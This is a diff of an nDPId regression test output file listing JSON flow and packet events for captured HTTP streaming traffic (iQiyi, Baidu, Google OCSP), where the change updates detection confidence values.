02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1467353138757,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAAUUA1lAAIAGkOvAqHMIZePIC8UfAFBKp6EFWDmKmFAQ\/\/B9QgAAR0VUIC90cmFjazI\/YT0xJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxMzgmYz1hZTg3Y2IzY2ZkZjQ5NGFhNDhkYzYwODkwOWY2OTI1MCZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTg4NzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTI3NTU4JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPWFlYTU2YTgwOGZjOTJlZjM2MDUxOTEyMTk0OGUwZjI3JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU5MTI0JnZlPTEmdz0yLDMgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFRSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} -01395{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=1&as=1;2,3;4,5&b=1467353138&c=ae87cb3cfdf494aa48dc608909f69250&cv=5.2.15.2240&d=5000000858874&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000927558&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=aea56a808fc92ef360519121948e0f27&sv=4.10.004&u=1&up=&v=5000000859124&ve=1&w=2,3","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01395{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=1&as=1;2,3;4,5&b=1467353138&c=ae87cb3cfdf494aa48dc608909f69250&cv=5.2.15.2240&d=5000000858874&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000927558&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=aea56a808fc92ef360519121948e0f27&sv=4.10.004&u=1&up=&v=5000000859124&ve=1&w=2,3","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1467353138757,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAADjA1pAAIAGlRvAqHMIZePIC8UfAFBKp6XxWDmKmFAY\/\/B4OwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} 00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1467353138794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353138794,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkTcBAAC8Gm3Rl48gLwKhzCABQxR9YOYqYSqemrFAYSdTGUAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7580000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1467353138931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":707,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":707,"pkt_l4_len":673,"thread_ts_msec":1467353138931,"pkt":"TF4M6gNlABxCjnAxCABFAAK1A3VAAIAG1W7AqHMIe31wMcUgAFAUdsqc+xrYh1AYQTe7PAAAR0VUIC9jbGs\/NTNlMjVlMzNlMDY0YzY1N2MwNmI1NThlNWMzYzMzZmQgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7580000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/clk?53e25e33e064c657c06b558e5c3c33fd","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7580000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/clk?53e25e33e064c657c06b558e5c3c33fd","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 01370{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1467353139050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":744,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":744,"pkt_l4_len":710,"thread_ts_msec":1467353139050,"pkt":"ABxCjnAxTF4M6gNlCABFAALaH2hAAC0GDFd7fXAxwKhzCABQxSD7GtiHFHbNKVAYADhuxwAASFRUUC8xLjEgMzAyIEZvdW5kDQpMb2NhdGlvbjogaHR0cHM6Ly95b3V0dS5iZS85b3ZjSndDN0FFYw0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLSUQ9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IFBhdGg9LzsgRG9tYWluPWhtLmJhaWR1LmNvbTsgRXhwaXJlcz1GcmksIDAxIEp1bCAyMDE2IDA2OjM1OjM4IEdNVA0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLTE9HPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBQYXRoPS87IERvbWFpbj1obS5iYWlkdS5jb207IEV4cGlyZXM9RnJpLCAwMSBKdWwgMjAxNiAwNjozNTozOCBHTVQNClAzUDogQ1A9IkNVUmEgQURNYSBERVZhIFBTQW8gUFNEbyBPVVIgQlVTIFVOSSBQVVIgSU5UIERFTSBTVEEgUFJFIENPTSBOQVYgT1RDIE5PSSBEU1AgQ09SIg0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KU2VydmVyOiBhcGFjaGUNCg0K"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1467353139305,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1467353139305,"pkt":"TF4M6gNlABxCjnAxCABFAAEKA4dAAIAGQVvAqHMIy0K2GMUiAFDWCs3i1IWCxVAYAQQdEwAAR0VUIC9vY3NwL01Fa3dSekJGTUVNd1FUQUpCZ1VyRGdNQ0dnVUFCQlR5NEdyNWhZb2RqWENiU1JramVxbTFHaWglMkJaQVFVU3QwR0ZodTg5bWkxZHZXQnRydGlHcnBhZ1M4Q0NFWXJGWGtxMnVneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IE1pY3Jvc29mdC1DcnlwdG9BUEkvNi4xDQpIb3N0OiBjbGllbnRzMS5nb29nbGUuY29tDQoNCg=="} -00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients1.google.com","url":"clients1.google.com\/ocsp\/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEYrFXkq2ugz","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} +00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients1.google.com","url":"clients1.google.com\/ocsp\/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEYrFXkq2ugz","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} 01465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1467353139309,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":813,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":813,"pkt_l4_len":779,"thread_ts_msec":1467353139309,"pkt":"ABxCjnAxTF4M6gNlCABFAAMfaWMAAD0GXGrLQrYYwKhzCABQxSLUhYLF1grOxFAYAO2vKAAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jc3AtcmVzcG9uc2UNCkRhdGU6IFR1ZSwgMjggSnVuIDIwMTYgMTc6MzQ6NDkgR01UDQpFeHBpcmVzOiBTYXQsIDAyIEp1bCAyMDE2IDE3OjM0OjQ5IEdNVA0KU2VydmVyOiBvY3NwX3Jlc3BvbmRlcg0KQ29udGVudC1MZW5ndGg6IDQ2Mw0KWC1YU1MtUHJvdGVjdGlvbjogMTsgbW9kZT1ibG9jaw0KWC1GcmFtZS1PcHRpb25zOiBTQU1FT1JJR0lODQpBZ2U6IDIxNzg0OQ0KQ2FjaGUtQ29udHJvbDogcHVibGljLCBtYXgtYWdlPTM0NTYwMA0KDQowggHLCgEAoIIBxDCCAcAGCSsGAQUFBzABAQSCAbEwggGtMIGWohYEFErdBhYbvPZotXb1gba7Yhq6WoEvGA8yMDE2MDYyODA3MDAxN1owazBpMEEwCQYFKw4DAhoFAAQU8uBq+YWKHY1wm0kZI3qptRoofmQEFErdBhYbvPZotXb1gba7Yhq6WoEvAghGKxV5KtroM4AAGA8yMDE2MDYyODA3MDAxN1qgERgPMjAxNjA3MDUwNzAwMTdaMA0GCSqGSIb3DQEBCwUAA4IBAQBKs877cfA5B2KGhwFSvIyUBYVxkUFjApJpIKog7zezUT4uRPAvbjktL\/Ds15nk8Y2Znhsf4SdVmf8GlloCQ6IXimfBklwRGn8\/72t77ZQLcabmXBFNBqyfqmRrW1O7lFh1alLxLnbN6PNKIPNv7dkTJVq4NRpJC1H3sykeA3XbH5EEaxhdvWFd1bsvybTiEgn7Bn5bpdXlExvoxRYuc7MLXQAUHRWSGKZpv+UniRokZRHgZy2GbGkQE8sf0PVCXrNjm4qsIXnQvqrF2J2xxFQ5x1wzU7J9l9Av+bPvuQI2mdLqvQskYq3tOxhJ6prFG9fcqt4lJS5E11mkG9tPXiAq"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7580000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01219{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1467353139505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":629,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":629,"pkt_l4_len":595,"thread_ts_msec":1467353139505,"pkt":"TF4M6gNlABxCjnAxCABFAAJnA5RAAIAG6ATAqHMIymwO28UjAFBUZatTb7o85VAYAQQGIwAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRzdGFydCZzdGFydHRtPTEwOTcmcmVzZXQ9MSZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMTkmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7580000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adstart&starttm=1097&reset=1&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353119&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7580000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adstart&starttm=1097&reset=1&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353119&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1467353139595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139595,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uuZAADMGf2DKbA7bwKhzCABQxSNvujzlVGWtklAYADcmHAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 